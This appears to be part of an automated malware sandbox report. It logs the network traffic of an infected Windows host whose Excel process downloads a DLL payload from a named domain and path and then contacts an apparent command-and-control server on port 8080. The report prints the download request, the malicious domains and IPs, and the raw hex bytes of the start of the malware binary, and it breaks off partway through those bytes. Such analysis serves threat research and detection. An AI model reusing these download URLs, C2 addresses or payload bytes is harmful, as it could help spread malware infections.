                                                                                      May 23, 2022 09:00:56.692445993 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.692466021 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.704179049 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.704220057 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.704246044 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.704297066 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.705051899 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.714031935 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.714138031 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.721550941 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.721582890 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.721633911 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.721663952 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.729743958 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.729778051 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.729834080 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.729865074 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.739662886 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.739698887 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.739753962 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.739787102 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.745182991 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.745220900 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.745265007 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.745301008 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.756014109 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.756118059 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.760718107 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.760749102 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.760771990 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.760797977 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.760823965 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.788299084 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.788336039 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.788356066 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.788378000 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.788451910 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.788485050 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.792037010 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.792067051 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.792174101 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.823548079 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.823579073 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.823601007 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.823668003 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.823724031 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.838999033 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.839041948 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.839067936 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.839173079 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.839234114 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.854549885 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.854583979 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.854608059 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.854645967 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.854667902 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.854686975 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.854728937 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.854732990 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.854756117 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.873488903 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.873512030 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.873528004 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.873553991 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.873585939 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.885757923 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.885795116 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.885823965 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.885834932 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.885852098 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.885859013 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.885876894 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.885899067 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.917124033 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.917155027 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.917176962 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.917198896 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.917220116 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.917222977 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.917242050 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.917248964 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.917264938 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.917287111 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.917323112 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.935044050 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.935076952 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.935101032 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.935111046 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.935147047 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.935158968 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.948225021 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.948367119 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.948404074 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.948462963 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.954560041 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.954647064 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.954690933 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.954725981 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.973561049 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.973627090 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.973673105 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.973695040 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.973701954 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.973745108 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.990128994 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.990195036 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.990209103 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.990242958 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.990263939 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.990278959 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.995053053 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.995090961 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.995119095 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.995121956 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:56.995146990 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:56.995174885 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.010705948 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.010802984 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.010823965 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.010848999 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.010876894 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.010881901 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.017115116 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.017179966 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.033204079 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.033229113 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.033245087 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.033272028 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.033296108 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.033299923 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.033337116 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.058135033 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.058161020 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.058176994 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.058192968 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.058207035 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.058238029 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.058243036 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.073262930 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.073287010 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.073307991 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.073328972 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.073354006 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.073385954 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.088884115 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.088926077 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.088944912 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.088959932 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.088970900 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.088996887 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.089000940 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.089041948 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.104507923 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.104545116 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.104567051 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.104619980 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.104661942 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.120110035 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.120148897 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.120172977 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.120191097 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.120197058 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.120223045 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.120228052 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.120229959 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.136269093 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.136305094 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.136328936 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.136351109 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.136395931 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.136401892 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.151408911 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.151463985 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.151504040 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.151505947 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.151544094 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.151546955 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.151555061 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.151595116 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.167064905 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.167128086 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.167170048 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.167208910 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.167211056 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.167272091 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.167280912 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.182733059 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.182780981 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.182818890 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.182857990 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.182879925 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.182925940 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.182934046 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.182940006 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:00:57.198183060 CEST8049178138.219.41.210192.168.2.22
                                                                                      May 23, 2022 09:00:57.198352098 CEST4917880192.168.2.22138.219.41.210
                                                                                      May 23, 2022 09:01:32.747643948 CEST491798080192.168.2.22173.82.82.196
                                                                                      May 23, 2022 09:01:32.920866013 CEST808049179173.82.82.196192.168.2.22
                                                                                      May 23, 2022 09:01:32.921032906 CEST491798080192.168.2.22173.82.82.196
                                                                                      May 23, 2022 09:01:33.123497009 CEST491798080192.168.2.22173.82.82.196
                                                                                      May 23, 2022 09:01:33.296674967 CEST808049179173.82.82.196192.168.2.22
                                                                                      May 23, 2022 09:01:33.314415932 CEST808049179173.82.82.196192.168.2.22
                                                                                      May 23, 2022 09:01:33.314440012 CEST808049179173.82.82.196192.168.2.22
                                                                                      May 23, 2022 09:01:33.314538002 CEST491798080192.168.2.22173.82.82.196
                                                                                      May 23, 2022 09:01:33.314567089 CEST491798080192.168.2.22173.82.82.196
                                                                                      May 23, 2022 09:01:33.363708973 CEST491798080192.168.2.22173.82.82.196
                                                                                      May 23, 2022 09:01:33.536870003 CEST808049179173.82.82.196192.168.2.22
                                                                                      May 23, 2022 09:01:33.540446997 CEST808049179173.82.82.196192.168.2.22
                                                                                      May 23, 2022 09:01:33.540642023 CEST491798080192.168.2.22173.82.82.196
                                                                                      May 23, 2022 09:01:36.017899036 CEST491798080192.168.2.22173.82.82.196
                                                                                      May 23, 2022 09:01:36.191375017 CEST808049179173.82.82.196192.168.2.22
                                                                                      May 23, 2022 09:01:36.872672081 CEST808049179173.82.82.196192.168.2.22
                                                                                      May 23, 2022 09:01:36.872942924 CEST491798080192.168.2.22173.82.82.196
                                                                                      May 23, 2022 09:01:39.889571905 CEST808049179173.82.82.196192.168.2.22
                                                                                      May 23, 2022 09:01:39.889595985 CEST808049179173.82.82.196192.168.2.22
                                                                                      May 23, 2022 09:01:39.889755964 CEST491798080192.168.2.22173.82.82.196
                                                                                      May 23, 2022 09:01:49.536953926 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:01:50.129317045 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:01:50.785705090 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:01:52.017033100 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:01:54.435265064 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:01:59.240597963 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:02:08.897792101 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:02:18.665324926 CEST491758080192.168.2.22173.82.82.196
                                                                                      May 23, 2022 09:02:18.668891907 CEST491758080192.168.2.22173.82.82.196
                                                                                      May 23, 2022 09:02:54.762828112 CEST8049178138.219.41.210192.168.2.22
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      May 23, 2022 08:59:56.366964102 CEST5586853192.168.2.228.8.8.8
                                                                                      May 23, 2022 08:59:56.484303951 CEST53558688.8.8.8192.168.2.22
                                                                                      May 23, 2022 09:00:00.250773907 CEST4968853192.168.2.228.8.8.8
                                                                                      May 23, 2022 09:00:00.381565094 CEST53496888.8.8.8192.168.2.22
                                                                                      May 23, 2022 09:00:32.750127077 CEST5527553192.168.2.228.8.8.8
                                                                                      May 23, 2022 09:00:32.770751953 CEST53552758.8.8.8192.168.2.22
                                                                                      May 23, 2022 09:00:54.467794895 CEST5991553192.168.2.228.8.8.8
                                                                                      May 23, 2022 09:00:54.488017082 CEST53599158.8.8.8192.168.2.22
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      May 23, 2022 08:59:56.366964102 CEST192.168.2.228.8.8.80x1405Standard query (0)www.melisetotoaksesuar.comA (IP address)IN (0x0001)
                                                                                      May 23, 2022 09:00:00.250773907 CEST192.168.2.228.8.8.80xa84dStandard query (0)elamurray.comA (IP address)IN (0x0001)
                                                                                      May 23, 2022 09:00:32.750127077 CEST192.168.2.228.8.8.80xca36Standard query (0)masyuk.comA (IP address)IN (0x0001)
                                                                                      May 23, 2022 09:00:54.467794895 CEST192.168.2.228.8.8.80x68baStandard query (0)jr-software-web.netA (IP address)IN (0x0001)
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      May 23, 2022 08:59:56.484303951 CEST8.8.8.8192.168.2.220x1405No error (0)www.melisetotoaksesuar.commelisetotoaksesuar.comCNAME (Canonical name)IN (0x0001)
                                                                                      May 23, 2022 08:59:56.484303951 CEST8.8.8.8192.168.2.220x1405No error (0)melisetotoaksesuar.com212.98.224.29A (IP address)IN (0x0001)
                                                                                      May 23, 2022 09:00:00.381565094 CEST8.8.8.8192.168.2.220xa84dNo error (0)elamurray.com66.84.31.11A (IP address)IN (0x0001)
                                                                                      May 23, 2022 09:00:32.770751953 CEST8.8.8.8192.168.2.220xca36No error (0)masyuk.com128.199.252.32A (IP address)IN (0x0001)
                                                                                      May 23, 2022 09:00:54.488017082 CEST8.8.8.8192.168.2.220x68baNo error (0)jr-software-web.net138.219.41.210A (IP address)IN (0x0001)
                                                                                      • www.melisetotoaksesuar.com
                                                                                      • elamurray.com
                                                                                      • jr-software-web.net
                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.2249173212.98.224.29443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.224917466.84.31.1180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      May 23, 2022 09:00:00.499557018 CEST375OUTGET /athletics-carnival-2018/3UTZYr9D9f/ HTTP/1.1
                                                                                      Accept: */*
                                                                                      UA-CPU: AMD64
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: elamurray.com
                                                                                      Connection: Keep-Alive
                                                                                      May 23, 2022 09:00:00.677292109 CEST377INHTTP/1.1 200 OK
                                                                                      Date: Mon, 23 May 2022 07:00:00 GMT
                                                                                      Server: Apache
                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      Expires: Mon, 23 May 2022 07:00:00 GMT
                                                                                      Content-Disposition: attachment; filename="F3DOS06hLF1rUq3s6XOB.dll"
                                                                                      Content-Transfer-Encoding: binary
                                                                                      Set-Cookie: 628b30f095562=1653289200; expires=Mon, 23-May-2022 07:01:00 GMT; Max-Age=60; path=/
                                                                                      Last-Modified: Mon, 23 May 2022 07:00:00 GMT
                                                                                      Content-Length: 376320
                                                                                      Vary: User-Agent
                                                                                      Keep-Alive: timeout=5, max=100
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-msdownload
                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ea 8c e5 53 ae ed 8b 00 ae ed 8b 00 ae ed 8b 00 c1 9b 15 00 a4 ed 8b 00 c1 9b 21 00 ce ed 8b 00 a7 95 18 00 a9 ed 8b 00 ae ed 8a 00 cb ed 8b 00 c1 9b 20 00 84 ed 8b 00 c1 9b 10 00 af ed 8b 00 c1 9b 11 00 af ed 8b 00 ae ed 1c 00 ac ed 8b 00 c1 9b 16 00 af ed 8b 00 52 69 63 68 ae ed 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c5 a2 86 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 60 01 00 00 82 04 00 00 00 00 00 7c 90 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 90 fc 01 00 72 00 00 00 24 f2 01 00 50 00 00 00 00 70 02 00 98 90 03 00 00 50 02 00 3c 12 00 00 00 00 00 00 00 00 00 00 00 10 06 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 01 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5e 01 00 00 10 00 00 00 60 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 8d 00 00 00 70 01 00 00 8e 00 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 10 43 00 00 00 00 02 00 00 1c 00 00 00 f2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 3c 12 00 00 00 50 02 00 00 14 00 00 00 0e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 98 90 03 00 00 70 02 00 00 92 03 00 00 22 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 08 00 00 00 10 06 00 00 0a 00 00 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$S! RichPEdb" `| @r$PpP<p .textZ^` `.rdatapd@@.dataC@.pdata<P@@.rsrcp"@@.reloc@B
                                                                                      May 23, 2022 09:00:00.677325010 CEST378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      May 23, 2022 09:00:00.677349091 CEST380INData Raw: 48 8b ec 48 83 ec 70 83 65 c0 00 83 65 c4 00 48 8d 05 30 ff ff ff ba 6b 00 00 00 48 89 45 b8 c7 45 b0 50 00 00 00 c7 45 b4 03 00 00 00 48 89 4d c8 ff 15 2b 5e 01 00 ba 00 7f 00 00 33 c9 48 89 45 d0 ff 15 22 5e 01 00 48 8b 4d c8 ba 6c 00 00 00 48
                                                                                      Data Ascii: HHpeeH0kHEEPEHM+^3HE"^HMlHEHHEHEHEm]HMHE]Hp]H\$Ht$WH HH3HcHwDuHLHHPhDHHcHHtQHyHDE3Ht$8HH\$
                                                                                      May 23, 2022 09:00:00.677372932 CEST381INData Raw: f4 ff ff 48 81 ec 20 0c 00 00 48 8b 05 7f ec 01 00 48 33 c4 48 89 85 10 0b 00 00 ff ca 48 8b f9 0f 85 93 3c 00 00 c7 44 24 50 0a fe 0e 65 c7 44 24 54 5d 33 60 13 c7 44 24 58 0e 13 39 76 45 33 ff c7 44 24 5c 39 03 00 72 c7 44 24 60 07 61 b8 fd c7
                                                                                      Data Ascii: H HH3HH<D$PeD$T]3`D$X9vE3D$\9rD$`aD$d$zD$hDjmD$lXRmD$pD$t;;)PD$xQLD$|$EE'DrdE~{dE5EOE{E*%!ErE}EwBAE~E oE$SEx9
